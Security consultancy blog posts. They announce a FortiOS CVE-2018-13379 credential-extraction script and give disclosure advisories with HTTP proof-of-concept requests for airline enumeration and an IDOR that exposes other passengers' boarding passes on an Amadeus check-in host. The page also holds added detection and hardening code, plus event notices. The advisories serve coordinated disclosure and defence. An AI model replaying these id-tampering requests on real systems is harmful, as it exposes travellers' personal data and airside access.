Exploit Script for CVE-2018-13379

While conducting further analysis of the path traversal vulnerability within the FortiOS SSL VPN web portal, the team at 7 Elements created a script to enumerate vulnerable hosts and extract sensitive information such as user names and passwords.

The following video shows the tool in action with the ability to scan multiple hosts (the script used for the purpose of the video masks sensitive information):

Using the script it was possible to enumerate ~200k hosts globally, identifying around 20,000 vulnerable hosts and extracting over 60,000 credentials (further blog post to follow).

Both the NSA and NCSC have recently posted advisories alerting on the use of this vulnerability by Nation State Advanced Persistent Threat (APT) actors to gain access to enterprise environments.

Over three weeks prior to the advisories, the team here at 7 Elements identified that what was then being reported as a medium-level risk issue was in fact a critical impact issue. More on that can be found here.

Today we have released a version of the script that is limited to a single IP/host, to enable testing against devices owned by the individual running the script. The tool can be downloaded here.


CYBERISLE 2019

CYBERISLE 2019 is the Isle of Man government’s flagship cyber security event.

Hosted by the Office of Cyber Security & Information Assurance (OCSIA), CYBERISLE 2019 features world-class speakers, solutions and opportunities for interaction between the public and private sectors. The event is free to attend and will be at the Royal Hall, Villa Marina, Douglas, Isle of Man on the 23rd October 2019.

As part of the event, our CEO, Dave Stubley will deliver a talk on Protecting the Enterprise: Business Email Compromise.

Talk Introduction:

What does a successful compromise of an organisation's email system look like, and what can we do to protect ourselves?

A recent study by the U.S. Treasury Department revealed that business email compromise scams were costing U.S. companies more than $300 million a month, and the FBI warned that the total financial loss globally due to BEC attacks is at least $12.5 billion. Closer to home, the UK’s National Cyber Security Centre (NCSC) reported that BEC attacks cost UK businesses £32 million (in 2017/18).

This talk will use real-life case studies from recent incidents to dissect the anatomy of a modern Business Email Compromise (BEC) attack, from current attack trends to mailbox manipulation and exfiltration of sensitive data through to onward compromise of new mailboxes. Building on this knowledge we will then explore easy to implement mitigation strategies.

For more information about CYBERISLE 2019 and to register, please visit the events page here.

Airline Enumeration within Amadeus Check-in Application

Advisory Information

Title: Airline Enumeration within Amadeus Check-in Application

Date Published: 16th July 2019

Author: David Stubley, david.stubley@7elements.co.uk, @DavidStubley (twitter)

Advisory Summary

It was possible to enumerate supported airlines of the Amadeus Check-in Application using the URL generated as part of an airline mobile application check-in process.

Example of a link to a boarding pass generated by the platform:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=440968951&ln=en&productIndex=0

(URL provided is no longer valid as it is past the departure time).

The highlighted ‘QS’ in the path is an IATA airline code.

PoC

The following proof of concept shows that due to a lack of authentication required for access to the resource as well as a lack of brute force protection, it was possible to automate an attack to enumerate supported airlines.

Request

GET /1ASIHSSCWEB§OA§/sscw§oa§/mbp?IFOI=DCS&id=300193064&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Jul 2019 11:48:30 GMT
Content-Type: text/html
Connection: close
Content-Length: 7078

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>Olympic Air Internet check in</title>

Using Burp Intruder to do the heavy lifting (the § markers in the request above delimit the payload positions):

Timeline

Advisory sent – 10th July 2019

Requested confirmation that the advisory has been received by Amadeus – 11th July 2019

Update and confirmation that Amadeus are taking remediation action (advised via FlyBe) – 11th July 2019

Advised Civil Aviation Authority (CAA) on vulnerability – 11th July 2019

Requested update from Amadeus and provided notice to publish – 12th July 2019

Remediation activity completed by Amadeus (based upon dates provided by FlyBe) – 15th July 2019

Advisory published by 7 Elements – 16th July 2019

Insecure Direct Object Reference within Amadeus Check-in Application

Advisory Information

Title: Insecure Direct Object Reference within Amadeus Check-in Application

Date Published: 16th July 2019

Author: David Stubley, david.stubley@7elements.co.uk, @DavidStubley (twitter)

Advisory Summary

It was possible to download valid boarding passes (not belonging to the user) for future flights due to a weakness within the application (Insecure Direct Object Reference).

Example of a link to a boarding pass not belonging to the user:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=300193064&ln=en&productIndex=0

Insecure Direct Object Reference or IDOR vulnerabilities occur when an application provides direct access to objects based on user-supplied input, bypassing expected authentication and user access controls.

The vulnerable site is: https://checkin.si.amadeus.net

The vulnerable parameter is the ID field within the /mbp application end point.

PoC

The following proof of concept shows access to a boarding pass not associated with the user.

Step One: First intercept a request to generate a boarding pass:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:41:28 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70581

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Step Two: Change the id parameter to access a boarding pass not associated with the user:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=10442131&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:44:13 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70764

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

The response shows a valid PDF document returned to the user.

Timeline

Advisory sent – 8th July 2019 (to FlyBe), 10th July 2019 (to Amadeus)

Requested confirmation that the advisory has been received by Amadeus – 11th July 2019

Update and confirmation that Amadeus are taking remediation action (advised via FlyBe) – 11th July 2019

Advised Civil Aviation Authority (CAA) on vulnerability – 11th July 2019

Requested update from Amadeus and provided notice to publish  – 12th July 2019

Remediation activity completed by Amadeus (based upon dates provided by FlyBe) – 15th July 2019

Advisory published by 7 Elements – 16th July 2019

I know what you did this summer…

Introduction

In a recent technical advisory that can be found here, 7 Elements discovered that it was possible to download valid boarding passes (not belonging to the user) for future flights that impacted all airlines using the Amadeus Check-in platform. This was due to a weakness within the application known as an IDOR vulnerability (Insecure Direct Object Reference). See OWASP for more background on IDOR.

The following images show two boarding passes obtained through the IDOR vulnerability before the issue was remediated by Amadeus:


Impact

The IDOR vulnerability, combined with the ability to determine all airlines using the platform, makes this an issue that impacted Amadeus globally and every airline utilising the platform. The issue also highlights the importance of gaining assurance that commercial off-the-shelf (COTS) based solutions are fit for purpose, rather than placing trust in the solution provider's hands. As with most things in life, the old saying of ‘Trust but Verify’ is still king.

PII – Downloading valid boarding passes discloses customer names and flight details. The boarding pass also contains the booking reference; with that and the surname it would be possible to gain access to the booking and further sensitive information such as contact details (mobile phone etc.).

Access to Restricted Areas – While further ID checks should prevent the actual use of another user's boarding pass to board the flight, the boarding pass could still provide access to the airside area of the departure terminal. As such, malicious use of this issue could result in unauthorised access to all airports serviced by those airlines using the Amadeus platform. It should be noted that additional security controls may restrict the successful use of a boarding pass that has already been used to gain access airside. However, those controls are not uniformly deployed across all airports.

Details

When using an airline branded mobile application to check-in, it was noted that the mobile application makes a call to the Amadeus hosted application to retrieve the boarding pass.

Screenshot showing the link to ‘Display Boarding Passes’:

Clicking on the link prompts the following response:

Opening a new web page to display the boarding pass.

The URL accessed contains a parameter called ID. By changing the value within the ID parameter, it was possible to access other valid boarding passes.

Example URL:

https://checkin.si.amadeus.net/1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0

The structure of the web request allows other airlines that utilise the Amadeus platform to be targeted by changing the two-letter codes shown below to match the relevant IATA airline code:

Example of a FlyBe request:

https://checkin.si.amadeus.net/1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0

Example of a Smartwings request:

https://checkin.si.amadeus.net/1ASIHSSCWEBQS/sscwqs/mbp?IFOI=DCS&id=440968951&ln=en&productIndex=0

(URLs provided are no longer valid as it is past the departure time).

Further to the IDOR vulnerability, it should be noted that there was a lack of authentication required for access to the resource as well as a lack of brute force protection. Given this, it was possible to automate an attack to enumerate supported airlines and valid ID values for boarding passes relating to any airline using the platform.
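As an added example (not from the advisory and not Amadeus's code), the following Python shows how a defender could spot this enumeration pattern in the check-in platform's web server access logs: it keys on the /mbp path, the two-letter airline segment and the id parameter, and flags any source that walks many distinct ids or probes many airline codes. The log lines are constructed to mimic the requests shown on this page, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Combined access-log shape (nginx/Apache); fields we do not use are skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# /1ASIHSSCWEB<XX>/sscw<xx>/mbp, where XX is the IATA airline code from the URL.
MBP_PATH_RE = re.compile(r'^/1ASIHSSCWEB(?P<code>[A-Z0-9]{2})/sscw[a-z0-9]{2}/mbp$')

def parse_mbp_request(line: str) -> Optional[Dict[str, object]]:
    """Extract ip, status, airline code and id from an /mbp request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    pm = MBP_PATH_RE.match(url.path)
    if not pm:
        return None
    ids = parse_qs(url.query).get("id", [])
    return {"ip": m["ip"], "status": int(m["status"]),
            "airline": pm["code"], "id": ids[0] if ids else None}

def find_enumeration(lines: List[str], max_ids: int = 5, max_airlines: int = 2) -> Dict[str, List[str]]:
    """Flag sources requesting many distinct ids, or probing many airline codes."""
    per_ip = defaultdict(lambda: {"ids": set(), "airlines": set(), "ok": 0})
    for line in lines:
        rec = parse_mbp_request(line)
        if rec is None:
            continue
        s = per_ip[rec["ip"]]
        s["ids"].add(rec["id"])
        s["airlines"].add(rec["airline"])
        s["ok"] += rec["status"] == 200      # count passes actually served
    alerts: Dict[str, List[str]] = {}
    for ip, s in per_ip.items():
        reasons = []
        if len(s["ids"]) > max_ids:
            reasons.append(f'{len(s["ids"])} distinct ids, {s["ok"]} answered 200')
        if len(s["airlines"]) > max_airlines:
            reasons.append(f'{len(s["airlines"])} airline codes probed')
        if reasons:
            alerts[ip] = reasons
    return alerts

# Constructed sample log: one genuine passenger, one source enumerating ids
# against FlyBe (BE) and then probing other airline codes in the path.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2019:10:41:28 +0000] "GET /1ASIHSSCWEBBE/sscwbe/mbp'
    '?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1" 200 70581',
    '203.0.113.5 - - [05/Jul/2019:10:41:41 +0000] "GET /favicon.ico HTTP/1.1" 404 0',
] + [
    f'198.51.100.7 - - [05/Jul/2019:10:44:{i:02d} +0000] "GET /1ASIHSSCWEBBE/sscwbe/mbp'
    f'?IFOI=DCS&id={10442100 + i}&ln=en&productIndex=0 HTTP/1.1" {200 if i % 3 else 404} 70764'
    for i in range(8)
] + [
    f'198.51.100.7 - - [05/Jul/2019:10:45:{i:02d} +0000] "GET /1ASIHSSCWEB{c}/sscw{c.lower()}/mbp'
    f'?IFOI=DCS&id=300193064&ln=en&productIndex=0 HTTP/1.1" 200 7078'
    for i, c in enumerate(["QS", "OA"])
]
```

In a real deployment the same counts would be kept per source over a sliding window and fed to rate limiting on the endpoint, which is the brute force protection the advisory notes was missing.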

Screenshot showing the enumeration of airline companies using the Check-in platform:

PoC

The following proof of concept shows access to a boarding pass not associated with the user.

Step One: First intercept a request to generate a boarding pass:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=104421747&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:41:28 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70581

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

Step Two: Change the id parameter to access a boarding pass not associated with the user:

Request:

GET /1ASIHSSCWEBBE/sscwbe/mbp?IFOI=DCS&id=10442131&ln=en&productIndex=0 HTTP/1.1
Host: checkin.si.amadeus.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Jul 2019 10:44:13 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 70764

%PDF-1.3
%âãÏÓ
1 0 obj<</Type/Catalog/Outlines 57 0 R/Pages 3 0 R>>
endobj
{snip}

The response shows a valid PDF document returned to the user.
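The PoC above works because the id in the URL is the only key the server checks. As an added example written for this page (not Amadeus's code), here is a minimal Python model of the /mbp lookup with the vulnerable direct lookup beside two hardened forms: an ownership check bound to the check-in session, and an indirect reference (a per-session random token in the link instead of the record id). The data store and session class are constructed stand-ins.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Set


@dataclass(frozen=True)
class BoardingPass:
    pass_id: int      # the internal record id that the vulnerable URL exposed
    passenger: str
    pnr: str          # booking reference printed on the pass (the PII at stake)


# Constructed sample store standing in for the check-in back end.
PASSES: Dict[int, BoardingPass] = {
    104421747: BoardingPass(104421747, "Passenger One", "ABC123"),
    10442131: BoardingPass(10442131, "Passenger Two", "XYZ789"),
}


def mbp_vulnerable(query_id: int) -> Optional[BoardingPass]:
    """Direct object reference: the id in the query string is the only key,
    so any caller that supplies a valid id receives that passenger's pass."""
    return PASSES.get(query_id)


class CheckinSession:
    """Authenticated check-in session. It records which passes this user
    checked in and hands out per-session random tokens instead of ids."""

    def __init__(self, owned_ids: Set[int]) -> None:
        self.owned = set(owned_ids)
        self.refs: Dict[str, int] = {}   # indirect reference map: token -> pass_id

    def issue_link(self, pass_id: int) -> str:
        """Mint the token that goes into the 'Display Boarding Passes' link."""
        if pass_id not in self.owned:
            raise PermissionError("pass not owned by this session")
        token = secrets.token_urlsafe(16)
        self.refs[token] = pass_id
        return token


def mbp_hardened_by_id(session: CheckinSession, query_id: int) -> Optional[BoardingPass]:
    """Minimal fix: keep the id in the URL, but enforce ownership server-side.
    Unowned ids get the same answer whether or not they exist (no oracle)."""
    if query_id not in session.owned:
        return None
    return PASSES.get(query_id)


def mbp_hardened_by_token(session: CheckinSession, token: str) -> Optional[BoardingPass]:
    """Stronger fix: the URL carries an unguessable token that only resolves
    inside the session that minted it, so there is no enumerable key at all."""
    pass_id = session.refs.get(token)
    if pass_id is None:
        return None
    return PASSES.get(pass_id)
```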


Threat Hunting

The slides from ‘Threat Hunting in the O365 Ecosystem’, given at the International Conference on Big Data in Cyber Security, are now online and can be found here:


The video of the talk can be found here:

DL100 Cyber Resilience Innovation of the Year

7 Elements shortlisted in DL100 Cyber Resilience Innovation of the Year category for second year!

7 Elements are delighted that our Incident Response Partnership has been shortlisted for the second year in a row in the DL100 Cyber Resilience Innovation of the Year category. We are very proud of our incident response service and are excited by the external recognition we are gaining from our peers!

What makes our approach different? In short, no up-front costs and a robust partnership model that delivers when needed. Our partnership clients only ever pay for the effort that they use, based on agreed upfront costs, so that there are no unwelcome surprises.

David Stubley, CEO 7 Elements

Positive and robust cyber resilience is now a fundamental business enabler. The ability of organised criminal gangs and motivated attackers to target organisations via the Internet has increased to a level where they are capable of executing attacks with little financial outlay that can result in huge financial gain for them, while causing both financial loss and reputational damage for the targeted organisation. Even non-targeted attacks can have catastrophic consequences and result in downtime and financial loss. Having a robust approach to incident response that is both flexible and proportional is now a key requirement for any organisation doing business online. Our incident response partnership is designed to give SMEs access to the same level of incident response services as blue-chip companies without the high costs.

Recent feedback from one of our clients dealing with a breach that resulted in financial loss:

We engaged 7 Elements to help us while dealing with a recent security issue. We found them to be extremely responsive and able to present their findings with real clarity, together with a comprehensive step-by-step plan which, on implementation, allowed us to give confidence to our Board and shareholders that the issues were not only understood but that all measures had been taken to ensure that there would be no repeat in future. We would recommend anyone not to rely solely on their IT provider, but to obtain advice on security from an expert, as prevention is the best cure and compromising on cybersecurity can prove extremely costly. We continue to work with David and his team at 7 Elements and cannot recommend them highly enough.

CFO, Commercial Property Developer


If you would like to know more and get on the front foot when dealing with cyber security incidents, then get in touch with the team.

As of the 12th April 2018, voting has now opened for each of the DL100 categories and we would like to take this opportunity to ask for your vote.

The DL100 winners will be announced at the awards dinner on the 21st June at the Sheraton Grand in London.


More information on our Incident Response Partnership can be found here.

International Conference of Big Data in Cyber Security

Our CEO, David Stubley will be speaking in Edinburgh at the International Conference on Big Data in Cyber Security on the 31st May 2018 at Napier University. With the threats to organisations increasing day by day, many organisations are moving towards SIEM (Secure Incident Event Management) to detect malicious activity. SIEM is now being applied in many different processes across the industry including security monitoring, incident response and cyber crime investigation.

The big data conference brings together industry, academia and law enforcement to share insights, ideas, expertise and resources in responding to current security challenges, and to look at the opportunities and challenges in managing and using big data in a cyber security context. The conference also aims to showcase good practice in industry and network investigations.

The conference hopes to cover the following areas:

  • insights into current high-profile security incidents, their impact, and how they are reported.
  • impact of GDPR.
  • key threats and risks associated with losing business critical data.
  • leading tools, techniques and insights in network threat analysis, detection and investigation.
  • best practice in implementing SIEM strategy.
  • developing and testing effective incident response.
  • evolution of the Security Operations Centre (SOC) and its emerging future requirements.
  • the need for skills, knowledge and awareness across an organisation.
  • latest research and innovation around threat discovery, machine learning, and data analysis.

David Stubley will be discussing ‘threat hunting in the Office 365 ecosystem’ at 2 pm in the Lindsay Stewart Theatre.

If you would like to know more about how we approach incident response, then please get in touch with our team.

Scottish Cyber Awards 2017

The Scottish Cyber Awards are back!

The Scottish Cyber Awards are returning this November and it looks set to be another great night. Last year, the event was a fantastic celebration of the Cyber Security community in Scotland and we hope this year will be even more successful!


As an Information Security Consultancy operating in Scotland, the Scottish Cyber Awards are close to our hearts, as we strongly believe that there is a talented InfoSec community here. We were delighted to be part of this event, both by sponsoring an award and through our CEO, David Stubley, acting as a judge for the entries. David said:

It was difficult to pick winners in some categories because the level of competition was so high, but it is fantastic to help give the winners the recognition that they deserve.


Last year, we were thrilled to be awarded the ‘Cyber SME Defender of the Year’ award and this year we are looking forward to passing the baton on to our successor. As an SME ourselves, we know the important role that Cyber SMEs play, which is why we were delighted to sponsor this award and are looking forward to congratulating this year’s worthy winner.

The Scottish Cyber Awards are being held at the Sheraton Hotel, Edinburgh on the 22nd November 2017.

Fraud and Breach Prevention Summit

Fraud & Breach Prevention Summit: London (17th and 18th October)

7 Elements are proud to be a sponsor of this year’s Fraud & Breach Prevention Summit in London.

We believe this summit is important in bringing the topic of security breaches into the public consciousness. As an information security consultancy delivering incident response capability for our clients, we are well placed to see the rising number of breaches.

Breaches happen to all types of organisation regardless of size or industry, and it is important to know how to deal with them effectively.

Our CEO, David Stubley, will be taking part in the following two panels and presenting on the topic of incident response:

  • ‘We’ve Been Breached: Now What? How to Effectively Work with Law Enforcement’
    15:20 on the 17th of October. The panel will discuss the importance of planning when it comes to incident response and working proactively with law enforcement.
  • ‘Equifax Breach: Long-term Implications. What Does It Mean for Europe?’
    16:05 on the 17th of October. The panel will discuss the long-term implication of the Equifax breach and the lessons that all organisations should learn from it.
  • In ‘Disaster Strikes: Here’s Your Incident Response Playbook’, David will discuss the five core principles all organisations should apply when responding to an incident. The talk will take place at 12:55 on the 18th of October.